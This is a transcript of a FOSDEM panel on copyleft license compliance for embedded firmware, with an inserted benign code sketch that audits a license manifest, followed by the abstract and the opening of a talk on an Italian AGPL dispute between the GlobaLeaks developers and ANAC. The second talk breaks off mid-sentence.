But really, we want everybody to participate in this process and treat this process as something that benefits them and creates a level playing field, where no competitor of yours is getting an advantage by skipping out on some of the requirements here. So I want to go back to Pidge, because of that interesting thing about the competitor issues: one of the important things about free software, and copyleft in particular, is that it assures that everybody's on equal footing. So Pidge, when you're looking at this from the embedded side of building these firmwares and checking the compliance of the firmwares and checking that they build, what concerns do you have as you're doing the analysis to sort of get to the conclusion of, well, does the source code really work? And are we putting something out there that can actually be collaborated over as far as the technological solution, versus just kind of meeting the bare minimum of the requirements, which might not necessarily inspire that kind of collaboration? Can you talk a little bit about how that divide gets handled when you're doing this kind of work, both as an upstream and for a client who's asking those questions? So I'm going to plug the project that I work on, the Yocto Project, in that. I have to, because when I wrote the initial pass of the license compliance stuff, and when I was told to write that, I was told to go talk to the lawyers about this, and I'm like, screw that, I'm going to go talk to Bradley, because he's the one doing license compliance. You remember the conversation, I'm sure. And I went and talked to the lawyers, and then I talked to Bradley, and then I was like, okay, this is what he's looking at. So from my perspective, the outputs that the Yocto Project gives should also be able to be inputs as well, so that people can do this. And it makes sense from an embedded perspective, because if you look at where embedded is going, if your refrigerator is embedded, refrigerators last, what, 10 years? I don't want to be maintaining firmware for 10 years. I want the community to go out and do it. So from my perspective, there's compliance at the top of the stack, but it goes all the way down to the bottom of the build system, and ensuring that the things that come out of the top of the stack can be taken by the community and regenerated all from scratch. Now, there are folks that do not like doing that, and I tell them to suck it up, because it makes no sense not to do that. So that brings me back to a couple of things that Davide was saying. So there is this, and I always promised I'd ask a few hard questions, so this may be a hard one. But you mentioned a lot of these initiatives in your initial comments that are out there related to bills of materials and trying to get just a list of licenses, which I think everybody would agree is the first step you have to do. One of the concerns I've had, and I'll show a little bit of my bias here, is kind of what Pidge is saying: that that's a necessary but not sufficient thing to really get a compliant source code software build. So can you talk a little bit, Davide, about how you're treating this inside of a company when you're looking out there to say, well, okay, we do need to get that bill of materials together, but then we have to get a source release that actually works and that our customers can rebuild and reinstall onto our devices in the field, which I think we all agree is a technologically challenging thing to do?
How are you looking at that and addressing that, when so much of the compliance focus is just on that initial step and sometimes misses that later step? So I think those are complementary matters. And you know, it's hard to just draw a line, right? And I think it kind of goes back to a couple of things. Number one, why a company is in open source, right? So I think unless you're really a 1970s software company that still believes that, you know, the value is in the software itself, I think most of the software companies today have moved past the idea that you monetize the software itself, and it's about monetizing what's on top through value-added services, et cetera, et cetera. So in that perspective, software becomes the vehicle to, you know, value-added services and monetization. So I mean, you don't want to take any risks. I mean, you want to be complying until the very end of it, because you actually want people to use more and more and more of the software that you contribute, because by using that, that becomes the vehicle for you for an upsell, right? So when the business comes into the picture, now you understand that that's not a cost, like, screw it, you got to suck it up. No, it's not a cost, it's actually a value, you want to do that, right? And then as you start doing that, it's kind of natural that you're going to try to drive efficiency into the process of this, call it the compliance envelope, so that from the very beginning to the very end, the things that are added on have a piece of information, right, so that this compliance envelope can traverse, right? So I think, you know, in general, it's seen as an obstacle or a cost. And I'll tell you something different, right? Or something more: it's a cost if the organization is not mature enough to have figured out what the business model is on top of the code and the source code itself, but the moment that the organization is mature enough to figure out the business, the path to money, then being compliant adds up and helps you actually monetize and make business. And I'll tell you this as the last thing: you can see the maturity of your organization by this question, when you start implementing compliance into an organization that is getting mature but it's not quite there. The typical thing is, can I just use FOSSology? And it's like, kind of: if this is about your accuracy, then maybe it gets you 20% of the way; how about the red flags and the Christmas tree? Then now you're going to have to go fix things to make sure that the accuracy is high enough, right? And then, oh, I need to staff a team. Yes, you need to staff a team, because that's kind of important, right? So if you want to suck it up, you're going to suck it up properly. So get a team on board, because that's what you have to do to ensure that compliance envelope accuracy across the board. I think I'm going to spend the next five years paraphrasing Davide to say the mature companies should believe software freedom is part of their business model. So I know that's not exactly what you said, but you're sort of hinting at that, and I really like that. You can quote me on that. Oh, that's wonderful. I've got to quote you on that for sure. So Miriam, I want to come back to you. Following up on something that Pidge said that I'd really like to hear you comment on, there has been this divide going back to when my career began in the 90s.
So it predates even to heavy discussions of false compliance of engineers want to do what they want to do and get the product working and lawyers just get in their way. And lawyers give them instructions that don't make any sense. How are you looking at how we're going to do this going forward in the next generation? How do we get lawyers and engineers to talk together as equals who are working together on a team to do the right thing rather than being at odds with each other? How do you see that fitting into the future of compliance? I think one part of the solution to that might be to actually get lawyers to understand the technical backgrounds or at least understand the developers that they are talking to. I know there are some good projects even at university where they start to teach lawyers at least basics on development and software development and they at least have to pick that up. But I don't know if that's happening everywhere and enough. But I think that's one part of the solution so that you can actually understand what everyone is saying that you're talking to. The other thing I think is, again, maybe a solution for lawyers. They should start offering solutions and not just saying what doesn't work and trying to get them to find, to get to a solution together maybe. And at least I often find that when you explain the background and why some things are an issue or are a risk or whatever courts ruled on it differently, developers tend to understand that because they think really structured and in that regard very similarly to lawyers. So you get to a point where you can kind of get rid of the issues and focus on how you can move forward. I think rather quickly actually if you start at a point where you understand each other. Yeah, I definitely agree with that. So John, I want to turn back to you on that question. I think one of the things that we've tried to do in the activism world is that kind of connection you were talking about about why companies should really see it as their benefit to give software freedom to their users. And I so often see, and I'm sure we've all seen this, going back to Davide's point of the mature company, the less mature companies don't get this yet. So how do you see the words and requirements of the license, like what would you say to a company that's not mature that Davide is referring to? What would you say to them, John, about like to get them to stop focusing on just like meeting the bare minimum of the requirements and actually engaging in software freedom in a way that would benefit their company? Yeah, it's a question, I mean, I think part of it is to your company's robbing concern about reputation, you know, and I think that's definitely one part of the approach is to discuss that and the fact that this software constructed through sharing really is a community and it's in the company's interest to be a good citizen within that community and that will have benefits to them both depending on what business sector they're in, of course, but different kinds of benefits to them, one of which being when they do make a mistake, if they do make a mistake, there'll be a lot of community goodwill there, knowing that it was a mistake and plenty of people, including the Free Software Foundation, willing to help advise them on how to do things properly, as opposed to just filing a lawsuit. And I think so that the reputation and that kind of good citizen aspect is important. 
We'll also point to examples of where new and exciting things have been done as a result of the software being distributed to users, and probably you've written about the things that have happened with the router firmware: from that source code having to be released, since it was built on other GPL code, that led to new software that could be used by companies and put in their products and shipped. And then, of course, we want companies to be socially responsible and I think that is a persuasive argument in today's world especially, and it's about talking to companies about how your employees care about this, your customers care about this, you as a hopefully human being that desires to be ethical in this world should care about this, and trying to approach it from that standpoint as well. So I think there's all of those: the reputation, the practical benefits and the ethical, socially responsible reasons to talk about. Yeah, so I want to go to Pidge then, because Pidge, one of the things that I feel, and you can confirm or deny if I've got this right, but I feel like when I look at what you're trying to do, you're basically trying to get the details right for what John is talking about. And by that I mean, I see the kind of work you're doing is saying, well, yeah, I want to make companies be socially responsible, do the right thing with compliance, but I want to make it straightforward, easy and designed well for their engineers, like build that connection that Miriam was talking about between the engineers and the lawyers understanding what needs to be done, and make it part of a rote task like doing good testing on your software and doing other engineering and software development practices. So can you talk a little bit, and remember that the FOSDEM audience is pretty advanced, so if you can get a little bit into detail on how you see we do that as a technical matter, so that someday when you start from Yocto, you know, if I started from Yocto, the thing on the other end is going to be that compliant source release and Yocto is going to give it to me, or whatever project it is that would give it to me. So I'll give you an example of some of the last people we worked with for the past couple of years and we were doing compliance work with them. Every release, and they were doing like, you know, scrum sprints, so it was like once every three weeks, every release for multiple machine firmware, all of that. And I'm going to defend FOSSology here. All of that got generated, thrown up on the FOSSology site using the meta license tools layer, and someone who was familiar enough with the build system went through and did that work. And we found issues, you know, because it wasn't a one-off compliance thing: okay, yeah, we're done, we're released, done, we don't have to do this again. It was a continuous auditing of the entire process, and not just auditing. Did we go through and create a manifest? It was: did we go through, create a manifest? Did we go through, create a bill of materials? Is all the metadata in the scripts that control compilation out there, not just for GPL stuff, but for MIT, for BSD, for all of it? Did we ensure that anything that was embargoed because it was under a closed source license did not make it out as well? Which is important, you know, because there is closed source stuff on this.
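As an aside for readers, here is a minimal sketch of the kind of per-release audit Pidge is describing (the checklist continues in the next remarks). This is not the actual tooling used in that engagement; the manifest format, file name and license lists are illustrative assumptions, just to show how a generated license manifest could be checked on every release for copyleft entries missing corresponding source and for embargoed closed-source components.

```javascript
// Minimal sketch of a per-release license-manifest audit (illustrative only).
// Assumes a JSON manifest produced by the build system, shaped like:
// [{ "name": "busybox", "license": "GPL-2.0-only", "sourceProvided": true }, ...]
const fs = require("fs");

const COPYLEFT = [
  "GPL-2.0-only", "GPL-2.0-or-later", "GPL-3.0-only",
  "LGPL-2.1-only", "AGPL-3.0-only"
];
// Components that must never ship in the public release at all.
const EMBARGOED = ["Proprietary", "CLOSED"];

function auditManifest(path) {
  const manifest = JSON.parse(fs.readFileSync(path, "utf8"));
  const problems = [];

  for (const pkg of manifest) {
    // Copyleft components must have corresponding source available.
    if (COPYLEFT.includes(pkg.license) && !pkg.sourceProvided) {
      problems.push(`${pkg.name}: ${pkg.license} but no corresponding source in the release`);
    }
    // Embargoed / closed components must not appear in the public manifest.
    if (EMBARGOED.includes(pkg.license)) {
      problems.push(`${pkg.name}: closed-source component present in public release`);
    }
  }
  return problems;
}

// Example: run as one step of every three-week release pipeline.
const issues = auditManifest("release-manifest.json");
if (issues.length > 0) {
  console.error("Compliance audit failed:\n" + issues.join("\n"));
  process.exit(1);
}
console.log("Compliance audit passed.");
```

The point of a check like this is the one made in the discussion: compliance becomes a continuous, automated gate in the release process rather than a one-off exercise, so a violation fails the build instead of surfacing later.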
And also how much GPLv3 is in that, because embedded developers, well, not embedded developers, embedded manufacturers, don't necessarily like GPLv3, because they have difficulty with some of the things if they're trying to do a box that's locked down. So you know, there was this entire process that we had to go through, and we went through it once every three weeks and it was continuous. So when we start talking about compliance and thinking about compliance, we have to stop thinking about it as this one-off thing that we do and start thinking about it as continuous integration, continuous test, continuous audit and continuous testing of the stuff that comes out at the end. Is this usable for the end user? Is this something that's useful? What happens if Bradley comes knocking on our door? You know, these are things that we all had to start thinking about in what we were doing with this client of ours. So Davide, you're often in the position of being inside the company who would be a client to something like this. And I want to pick up on something you were saying about the mature company that will see that this is valuable. One of the things that we haven't really seen yet, because we've seen so much, like we're talking about so much effort going into the bill of materials stuff, we've got Pidge sort of doing your base firmware that you start from, that aids compliance, that Pidge was just talking about. But when do you think a company like Huawei can get to the point where it doesn't just want to participate upstream in Linux, like the full upstream, which I know it does, but wants to be participating in things like, let's make an entire firmware that everybody is collaborating on instead of each company doing their own firmware? And then that would mean, of course, less going back in and trying to get that firmware into compliance if everybody's using that same firmware base. How do you think we can get there? And can we even get there? Or is this divide between upstream and final build going to continue to be so wide? No, I think it's going to go on. And it's about defragmenting and defragmenting and defragmenting and defragmenting. If I take the Yocto Project, and I've been lucky enough to be one of the founding fathers back in 2010 when I was at Wind River, right, so that's how I know our friend here. And it was about creating one common set of technologies and tools for defragmenting the embedded device industry, meaning that it didn't reinvent the wheel, it didn't recreate the Linux kernel, bash, Apache, boa, whatever that is, it didn't reinvent BitBake, but it really creates an ecosystem, a sandbox where partners with the same goal in mind shared that effort so that each and every one of them could benefit in the end, right? And so that is the approach. Now that goes to Huawei. As a matter of fact, my team is responsible for launching in Europe OpenHarmony, which is the Huawei-led open source initiative to create an operating system that powers consumer devices. So this is Yocto, consumer devices is this, right? So it's not the entire industry, but it's this. So we are using and leveraging BitBake, Yocto LTS, but now we also need to support smaller devices that use Zephyr. That's another project, right? So now we get together consumer companies, device makers just like Huawei, Samsung, LG, just making names up, right? Just to give an example, Bosch, Siemens, LG, Sony, et cetera, et cetera.
And now you're defragmenting the consumer device industry, meaning that you're not just creating something called OpenHarmony, right, but it's an open-source play where those companies reuse Yocto, tailor it to consumer devices and defragment that industry. And they all participate in that open source project, in the compliance activity that we just mentioned so far. And at that point, once you have consumer companies just working together, right, to defragment the industry, it's very easy, because consumer companies are B2C, so they serve the end consumer and you are at the end of the chain, right? So I think we're going to proceed by defragmenting and defragmenting and defragmenting. And so long as this compliance envelope traverses this defragmentation effort, you will see participation. But defragmenting has to be there as a business goal, right? If there's no business goal in defragmenting, then participation is not going to be possible. That makes sense to me. I want to go back to Miriam now, because when I continue to hear everybody else here talk, I want to sort of see what the lawyers are saying, because one of the things I've noticed is the lawyers actually end up being on the front lines of this, because the first time they realize they have a compliance problem, they're going to make a comparison to GDPR, which of course we in the US, where I'm based, have to comply with because we give services to Europeans. And while even for an organization like the one I work for, where we really care about the goals of GDPR, it's still a pain to comply with GDPR. It's still work to be done. And every once in a while, I'm like, oh man, we really have to do that to our website? Well, GDPR says we have to. So Miriam, I want to ask you, and I'm not going to make you say percentages, but give us a sense: are companies where Davide is trying to say they ought to be, trying to build these firmwares, or are companies still coming to look at open source and free software and saying, darn, it's an annoying thing I have to comply with that I'd rather not have to do, why do I have to do it? What's the majority of what you're seeing, and what do you tell them to move them from one side of that to the other? Again, as I said before on, you know, what risks they see, I think the spectrum is just as wide in that area. So I've had clients say, yeah, we are now facing enforcement and actually we knew we had a problem there. We should have fixed it. We just didn't have the manpower to do it. Or we had to focus on GDPR or whatever else, and we had to put our teams there. That's kind of the middle. And then on, like, the upper end of the spectrum, you have companies coming in saying, we know there's open source software. We know we are not using it as much yet, but we know we're getting there. We're actually getting into the software business now as well. And we want to comply just for the sake of complying, because we think it's the right thing to do and we want to focus on that. And then on the other end of the spectrum, you still have a few companies that are really troubled by the idea or don't understand the reasoning behind it. But they usually get to a point where they say, well, it does make sense and I think we have to comply rather quickly. But again, it certainly depends on the companies you're talking to. I have to say I'm impressed by how it has changed over the last years.
It has gotten a lot better and a lot easier to sell compliance and to sell that they have to work on compliance. Most of them are really already at a point where they know they have to fix whatever issues they have and they just need to find a solution. So I'm certainly glad to hear that things are changing. I tend to be an eternal pessimist and think that it's not going to get better. But I also want to throw the same question to John. I mean, John, do you feel like at the end consumer level, people who get these devices, do you feel that we're getting to a point, or moving towards a point, where people feel empowered like they do in the wireless router market? Because on most of the wireless routers you can install an alternative firmware that's completely free software. I know from my work that that doesn't exist in any other sub-industry. Do you see it moving in that direction? Is Davide's dream getting there, is Miriam right that the companies are moving, or do we have a lot more work to do? And if so, what's that work, John? I think we have a lot more work to do. I think that I agree that there is much more widespread awareness. You can tell we're not in Brussels in January because I have the sun right in my face. But there's much more widespread awareness of free software and what it is, and much greater willingness to use it and engage with it. I think the problem I do see from an end user perspective is that there are so many other forces now pushing towards locking down devices for different reasons, and also just so many more kinds of devices. Now it's not just, can you rebuild the software on your laptop or your desktop or even your router, but your phone. If you have an iPhone, which has free software on it, you can't really install your own. You can technically apply and be a developer and install some of your own software, but there's no way to have a marketplace for free software on that device because it's prohibited. And so there's a lot of other pressures working against user freedom. And that's one big area where we have a lot of work to do. We have a certification program, Respects Your Freedom, where we're trying to promote businesses that do embrace fully, 100%, the notion that all the software on a device should be free. When it comes to compliance, you know, I do worry a bit about the kind of "it's good enough" or "our approach is good enough, we check enough of the boxes that we're going to reduce our risk, and that's what we're aiming for." I would definitely like to see more adoption of the actual values behind all this and just more understanding that most of these compliance challenges arise because of the attempt to combine proprietary software and free software. So, you know, we want to encourage people to push the envelope in the other direction, as opposed to trying to see how much proprietary software you can get away with distributing alongside the free software. You know, push it in the other direction and see how much of your software you can distribute as free; as a solution to the compliance challenges, it makes them a lot easier. And so there's a risk of saying this is all Pidge's job to solve. I do want to ask Pidge: how do you do that process with a client, when a client comes to you and they have embedded firmware and it's a mess and you're trying to tell them, switch to Yocto, do this?
Are you able to get through to them, to the other side where there is a big advantage, and change them into that mature company that we've been talking about, get them to care about the end user installing it? Or do they just come to you and say, fix my problem so I don't have to think about it again? Are they telling you, help us lock down the device? Are you having to push back with your clients about that? Yes and no. I think that a lot of the people that I have talked to, they understand that this is the right thing to do, and not necessarily for moral or ethical reasons, but for entirely selfish reasons. You see this kind of thing in, like, some of the EU things with Gaia-X, where they want privacy and open firmware all the way down to the chip level, because they don't necessarily trust closed binaries, closed blobs on the chip. You don't trust that. So I think that for a lot of folks, it's coming from either "I never want to get that email from Bradley" or "I never want to do this thing where I get kind of called out for using open source software in my products and not doing it right." So most of the folks that are there aren't fighting this, like the ones that I'm dealing with; but, I'll grant you that, those are the folks who are coming to me already. So it's the ones that aren't coming to folks that are the ones that we worry about, right? They're the ones who either don't think that they have a problem or don't know that they have a problem. So the ones that I talk to are already on board. So that brings me over to Davide, and probably the hardest question that just has to be asked, because Huawei is not a company that's known for its transparency. It's had some trouble with that. It's been accused of spying. It's been accused of doing things in the firmware that we in the free software world have always argued about: well, if your software is free software, we can check and verify. Do you think that's going to be an argument going forward inside your company, to say, if you do this and allow the users to rebuild and reinstall the firmwares on Huawei devices, I would argue that it gives you a great answer to the problems Huawei has faced. But I'd like to give you the opportunity to kind of address that: how do you connect up the transparency and other issues that Huawei has struggled with, with the transparency and user freedom that is inherent in FOSS, as you become a mature FOSS-adopting organization? Yeah, I think the answer is all in. So it's Huawei in first person, right? Huawei, which can be considered a person, a juridical person, right, has been particularly hit by services being pulled off or pulled away because of the nature of non-free services, right? So if a player in the industry feels that by using non-free software your business is going to be impacted, then, I mean, no: let's use free software. Let's use open source software. Not only that, if by using and by doing free software and participating in a community as an active open source citizen, now all of the bad marketing that I'm getting, right, it's going to go away, because I contribute first, I participate second. Now all of a sudden I'm using technology that everybody uses and contributing technology to the world. I'm not vendor locked in anymore. My brand in terms of transparency, protection of IP, et cetera, et cetera, you know, just gains value. I mean, all in, right? So in essence, that's the reason why my group was created.
In essence, that's why, after years and years and years of a career in open source at, you know, many companies in the US and Europe, Huawei came to me and said, listen, we're all in here. Can we build the open source technology center in Europe and be all in when it comes to open source, because it's good for us, it's strategic, it's good for the world, so let's go for it, right? I'm saying selfishly, selfishly, open source is really good, it's the strategy, it's the real strategy. Okay, well, we're coming towards the end of the session, and so to make sure that everybody gets a chance to say what they want to say, I want to go through and give everybody a minute or so to say whatever, something I didn't ask as moderator that you really want to make sure we covered or that you wanted to bring up. And I've been keeping track of people who have seen me looking over to their side about time. Miriam's had the least amount of time to speak, so I'm going to start with Miriam. Is there anything you wanted to say about FOSS compliance that we didn't get to? Yeah, one point I had been meaning to make before, when you were asking John and Pidge, actually. I think one thing, one development that I really like, is that companies are looking a lot more into contributing back and getting engaged in open source software projects, not only using but also looking at the other side. I think for many companies it's still a bit harder to look into that and to figure out where do I get engaged, what makes sense, where do I put my teams, what do I look at, but it's happening a lot more, and at least we do get a lot more questions around that, and I think that's a good development in this space. Thank you. So John, do you have anything that we didn't cover that you wanted to make sure was brought up? Yeah, I think that we're talking about compliance in particular with copyleft, and I know that a lot of people are talking about sustainability right now when it comes to the free software that they depend on, learning that the projects they depend on are maybe only maintained actively by a couple of people and are in a precarious situation. And I just want to emphasize how important we think copyleft is to sustainability. Copyleft is the thing that ensures that free software will keep begetting more free software, as opposed to more permissive licenses that put software out there that can then just be used to get proprietary software to market quicker, and that really undermines the sustainability of the whole system that businesses are being built on. So that was one thing I wanted to make sure was out there, and I just wanted to offer our help at the FSF. We do our best to maintain good kind of best practice documentation, which helps establish community norms and make all this a lot clearer for people, and we do a lot of kind of unsung work improving licensing hygiene in the projects that we notice. We even did a little bit with BigBlueButton, actually, that helped them clean up a few things with their licenses. So, you know, we're here to help. You can always contact us at licensing@fsf.org. And I just want to encourage everybody to go as far as you can, to push the envelope as far as you can. You know, don't lock down the device even if you think you might be able to get away with it. Embrace the idea that people can and do do creative things with your products, which will then probably benefit you in the long run, as well as just being a socially responsible thing to do.
And I can't help but jump in to say that free software builds for devices make the device's life last longer, and that means fewer devices ending up in landfills, which is another type of sustainability problem. And I want to go to Pidge and ask if there's anything you wanted to add that I didn't ask, or something about FOSS compliance you wanted to tell everybody? No, but I do want to second that, in that if you are using open source and building a business on open source, it makes absolutely no sense from a business perspective to starve open source. So, if you are using a lot of open source and not contributing back, either financially or with patches, start doing that now, because it is a business sense thing. It just makes business sense. On top of that, if I'm relying, from a security perspective, on things where there are three people who work on the project and only one of them is getting paid to work on the project, that's an issue, and as open source we need to get the larger utilizers of open source to start contributing back more and more. Davide, anything you wanted to make sure we covered that I didn't ask about? No, I think you asked all the hard questions. You gave me a chance to reply. So, it's a great thing. So I'm just going to complement what was just said. I mean, when it comes to contributing open source software, it's about business, and ecosystems are created for business reasons. I mean, companies get together because there's a business sense. But because there's a business sense, mature organizations measure the number or the efficiency of a project in terms of decreasing or increasing contributions. Meaning, if I'm the first to start a project and I get a second partner, third partner, fourth partner, fifth partner, I'm contributing 70%, 80%. Over time, I want to see that going down. I want to see that evenly distributed. Because if it's not evenly distributed, A, I'm the bully of the ecosystem. It's not open. I'm dominant. It's not good for marketing. And it's not efficient for me. So, back to the mature organization: it's about contribution. It's about being all in, and it's about sharing this burden together of contributing together and building something together. So that's how businesses think if they're mature enough. Thank you all so much for being here. I'm going to go around with everybody one last time and just give you a chance to say any URL or project that you want to promote, for people to look to for further information. I'll start with Miriam. Anything you want to promote or ask people to take a look at? We actually had to have at least one time someone saying, you are on mute now. Sorry about that. Sorry. Now, I have to think; there is actually a GDPR project that is open source. I think it's the French authority that's putting out a lot of open source software around GDPR compliance. So maybe plug them, because I think it's a good idea to do that. John, is there anything you want to give, a URL or something to promote, for folks to take a look at? Oh, he's on mute now too. Second time. Yeah. I think maybe we will actually have an announcement shortly about a continuing legal education series online to go with our conference, LibrePlanet, in March. And that's one place where we try to help lawyers, especially from corporations and businesses, advance in this area and also get this kind of time talking with each other. We're going to do an online version of that shortly; just watch fsf.org for more information.
Pidge, anything you want to promote as we wrap up? The Yocto Project, as always, because I have to. But also I'm working on a new project called Network Great Linux. It's going to be announced in a few weeks. But look for that coming out soon. And Davide, you get the last word: anything you want to promote that you're working on that you want folks to take a look at? Yocto Project, Zephyr project, Linux Foundation, the Eclipse Foundation, Free Software Foundation, OpenHarmony. You guys have fun at FOSDEM and that's it. You guys keep up the good work. This is going somewhere. I want to thank all our panelists for doing this difficult, difficult remote panel, and we're so glad that you joined us, and we hope that next year in Brussels we'll all be together and be able to go out to dinner after our panel then. Thank you all for being here. Thanks, Brad. Thank you. Thank you, Bradley. Goodbye guys. It was a pleasure. Bye.
|
Compliance with Open Source and Free Software licenses remains a perennial topic of discussion among policy makers in our community. However, little attention is paid to the motivations why these licenses have specific requirements. Specifically, at least for copyleft licenses, the licenses seek to bestow specific rights and freedoms to the users who receive the software integrated into the devices they use. This panel, containing a group of industry experts, consultants, and license enforcement experts, discusses the challenges and importance of assuring downstream can actually utilize the compliance artifacts they receive with products as intended by the license.
|
10.5446/13945 (DOI)
|
Thank you. My name is Carlo Piana. I'm a lawyer in Italy. I've been involved in free and open source software matters since the early years of this century. Maybe some of you know me from my work with the Free Software Foundation Europe and the European Legal Network and many other initiatives. I am a founding partner of Array, an IT law firm dedicated to information technology law and especially free and open source software licensing and compliance. Today we are presenting a case which we regard as being the first GPL case in Italy hitting a courtroom. That is interesting also because it involves a public administration distributing the software, and this public administration, interestingly enough, is the national anti-corruption authority. It's a happy ending story, fortunately. We brought them to compliance. We agreed on compliance after nearly two years of discussion. I'm going to be helped by my friends and colleagues: Fabio Pietrosanti, President of the Hermes Center, the producer and the manufacturer of GlobaLeaks, also the client, and my colleagues, Giovanni Battista Gallus and Alberto Pianon, both partners of Array too. Without any further ado, I will hand over to Fabio. Fabio, please introduce yourself, the Hermes Center and GlobaLeaks. Thank you. Thank you, Carlo. The Hermes Center for Transparency and Digital Human Rights is the NGO that in 2012 started up the GlobaLeaks whistleblowing software, a free software project working towards the protection of whistleblowers. It started just after the WikiLeaks Collateral Murder events, as a way to find out how NGOs, journalists and also public agencies and corporations can provide better protection to whistleblowers. This software is under an AGPL license, and it's being used by a variety of users within the different NGO and journalistic sectors, in particular within anti-corruption NGOs. And in that context, we started working with Transparency International, the key NGO existing in more than 110 different countries, and with the anti-corruption bodies, the public agencies looking at the fight against corruption. In that sense, we found ourselves reading a public consultation by the Italian National Anti-Corruption Authority while we were already working with and supporting the Transparency International Italy chapter by improving the GlobaLeaks free software in order to look in that direction of anti-corruption activism. And we were very direct in answering the public consultation with our insight and advice. This led us to start an informal cooperation that became a formal cooperation, without any economic basis, entirely done on a pro bono basis, developing a set of features that was useful for ANAC, the Italian National Anti-Corruption Agency, and possibly for all the Italian public agencies that had to deploy a whistleblowing system in the fight against corruption, because in Italy the law requires public agencies to provide a secure reporting channel for the fight against corruption. So we spent months of dedicated development and interaction with the anti-corruption agency, making improvements following needs that we spotted in the ongoing meetings that we had with them, to understand how we could make GlobaLeaks further evolve in serving the anti-corruption world, not just in the NGO and activist sector but also in the regulatory bodies that look toward supporting public agencies and corporations. In that, ANAC had a very good vision.
There were very well prepared technicians there, and with our CTO and lead developer Giovanni Pellerano we went through more than 20, 24 different feature sets and improvements to the software, with iterations between their managers and board and their technicians and different legal officers, and achieved a set of functional releases of the software. The code name of the software was OpenWhistleblowing and, interestingly enough, we heard informally that someone inside the public agency, which is a large and powerful central public agency, didn't like the "leaks" part of GlobaLeaks because it reminded them of WikiLeaks, and the internal decision was to use the code name OpenWhistleblowing. Fair enough: we are working to make the world a better place to stay, so it's fine to have this kind of code name. So we worked with them until we decided together, they decided, that it was the time to publish the modifications that we did to the software. Most of them were already being committed upstream into the main GlobaLeaks software, now being used by thousands and thousands of public agencies in the world, not just in Italy. But some of them were hard patches that we put into the code, and this was uploaded, committed into the GitHub profile of ANAC, slash anticorruzione on GitHub, under the code name OpenWhistleblowing, and we did it. So what happened next? It happened next that, well, there was a tender to move it forward, rather than developing in a community-oriented way and with an iterative, evolutionary approach to the software, like going iterative with a beta approach. And you know, the public tender became very nasty and very complicated. And basically we found that most of our pro bono work ended up in the hands of the winner of a very bureaucratic public tender, where as an NGO it's also quite difficult to meet the very same requirements. In the tender it was written to support a deprecated version of Microsoft SQL Server. And it was against our vision to go in the direction of supporting deprecated software in GlobaLeaks, which is secure by default and a very well integrated piece of free technology built from open source components. And so in the end, what happened next? I mean, Giovanni Battista Gallus can explain better than me. Thank you very much Fabio. So my role is to describe what happened and how we managed to obtain compliance with the AGPL, and we leave to Carlo and Alberto the details of the most important legal issues. So as far as we know, this is the first time that an AGPL compliance case has been brought before an Italian court, and one of the very first cases involving compliance asked from a public administration, and so I think it's quite interesting, even if we reached a settlement, so not a decision. So what happened?
GlobaLeaks, from which the prototype was developed, was uploaded on GitHub in 2016, together with the AGPL license plus the reasonable legal notice, as allowed under article 7b, "powered by GlobaLeaks", so additional terms under article 7b. And Hermes signed an agreement with ANAC, the Italian Anti-Corruption Authority, as already pointed out and mentioned by Fabio, and pursuant to this agreement Hermes gave ANAC control of the GitHub account, and then ANAC decided to issue a public tender for the development and maintenance of this prototype. And after quite a while, in 2019, so a few years after, they published in the project repository a derived version which was called OpenWhistleblowing, and there were however several issues, because the AGPL license was gone and it was replaced with the European Union Public License 1.2, and also the reasonable legal notice was removed, there was only the authors' note, and some of the corresponding source as defined in articles 1 and 6 of the license was not completely available, and also OpenWhistleblowing was adopted by several public administrations, and of course it was adopted in the incompatibly licensed flavor, so to speak. So what happened next? Carlo Piana, our friend, started writing to ANAC several times, trying to keep his well-known composure, to be as calm as possible, and never asking for damages but only asking for compliance on behalf of the Hermes Center. However, the answers of ANAC were not exactly friendly, and of course they stated they were not infringing anything, but compliance was not obtained, because they stated they were absolutely respecting and abiding by the license and the change of license was perfectly legal. And so the violation was ongoing, and so Hermes could avail itself of clause 8, article 8 of the AGPL, which provides for termination upon violation but also provides that, if the violator cures the violation within 30 days of the notification, then the license is permanently reinstated. But in this case, in the position of Hermes, ANAC was still in breach and didn't cure the violation, so article 8 was clearly triggered and the termination was clearly triggered, and Carlo tried to explain this, once again writing to ANAC, but they still stated they were perfectly compliant. However, after a certain time, they published a commit, after the license was terminated, relicensing OpenWhistleblowing as AGPLv3, but there was still no compliance with regard to the reasonable legal notice and also with regard to the corresponding source. However, after a while, after the proceeding I will mention in a while had started, they also published part of the corresponding source, especially of the client, not in a minified version as they did before. But of course, in the Hermes position, the license was already terminated and Hermes was the only copyright holder, so only Hermes could reinstate the license, and at any rate there was still no compliance on the other issues, so there was no alternative and Hermes started legal proceedings before the tribunal of Milan. Carlo and Alberto will deal in depth with the issues of licensing compatibility, termination and minified code; I will just keep on telling the tale, which is, I think, very interesting. And what did Hermes do?
Hermes asked for a preliminary injunction under the Italian copyright law, and the judge was asked to assess the non-compliance and grant an injunction. In what terms? The injunction was to cease and desist from any use accessible to the public, or any publication, of the derived work until the conditions imposed by the AGPL license and the additional terms were met, and subject to the reinstatement of the license by Hermes. It was also asked for a penalty for every day of non-compliance, and it was also asked to order ANAC to publish the court decision not only in the way provided by the Italian copyright law but also on the web portal of the authority and in the GitHub repository, and also to notify the decision to all public administrations which had asked for use of the derivative work. And in this case, in the legal proceeding, the authority, unsurprisingly enough, denied being non-compliant and strongly stated that relicensing under the EUPL was perfectly legal, and also stated that the additional terms were not applicable and the corresponding source obligations were met. And as I already stated, the corresponding source was published, but only after the proceedings were started. And it is very interesting to point out that there was no objection or even any discussion about the legal validity or the binding nature of the AGPL provisions, so it was just a matter of the interpretation of these provisions and whether there was compliance or not. It seemed that the parties were really worlds apart, but then Carlo had a trick up his sleeve and he made a settlement proposal that they absolutely couldn't refuse. So, to put it briefly and not exactly in legalese, he proposed: okay, you get the license right, you publish the corresponding source, just go one step further, add the additional terms, and we will reinstate the license, and everybody will be happy at the end. And at this point, after some back and forth, also before the judge in Milan, the authority agreed and the settlement was done out of court, and both Hermes and the authority issued a joint press release, and so really everybody was happy. So what is the most important lesson to be learned? Well, I leave it to Carlo and Alberto to sum it up, and I thank you all and I hope to see you soon in the very near future. Thank you Giovanni. Lessons learned. The first lesson I personally learned from this ordeal is that we lack education. We must produce better information, more accessible information, and we have to spare no effort to bring ordinary people to a sufficient level of knowledge. We have won the battle of having free software mainstream, dominant in certain places, but that has not been followed by a sufficient degree of education, and we have learned it the hard way here, because we approached the authority and they said, no, we're not infringing on any of your copyright. We insisted on explaining, making reference to documents, and they would say, oh look, you might know that this is open source, now it's copyleft, meaning that there are no conditions for reusing 